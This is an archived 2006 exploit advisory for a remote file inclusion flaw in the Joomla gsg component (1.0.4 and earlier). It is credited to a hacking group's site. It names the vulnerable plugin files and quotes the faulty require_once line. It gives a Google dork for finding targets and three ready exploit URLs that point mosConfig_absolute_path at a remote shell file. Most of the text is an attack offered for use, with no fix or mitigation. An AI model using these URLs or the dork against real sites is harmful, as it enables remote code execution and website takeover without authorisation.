Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14495
HistorySep 29, 2006 - 12:00 a.m.

Joomla gsg Component <= 1.0.4 Remote File Include Vulnerability

2006-09-2900:00:00
vulners.com
59

!!!WWW.SiBERSAVASCiLAR.COM!!!

Title : Joomla gsg Component <= 1.0.4 Remote File Include Vulnerability


#Author: Crackers_Child

#cont@ct: [email protected]


Google Dorks : allinurl:"/com_gsg/"




Bug in archive.class.php , mosTree.class.php , rss.class.php

global $database, $mosConfig_absolute_path;
global $gsg_url_changefreq, $gsg_url_priority;

    require_once

($mosConfig_absolute_path."/administrator/components/com_gsg/gsg.class.php");


Exploit:

http://www.site.com/joomla_path/administrator/components/com_gsg/plugins/archive.class.php?mosConfig_absolute_path=Shell.txt
?

http://www.site.com/joomla_path/administrator/components/com_gsg/plugins/mosTree.class.php?mosConfig_absolute_path=Shell.txt
?

http://www.site.com/joomla_path/administrator/components/com_gsg/plugins/rss.class.php?mosConfig_absolute_path=Shell.txt
?


greets:

All My Friends And SiberSavascilar.Com Members !


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ]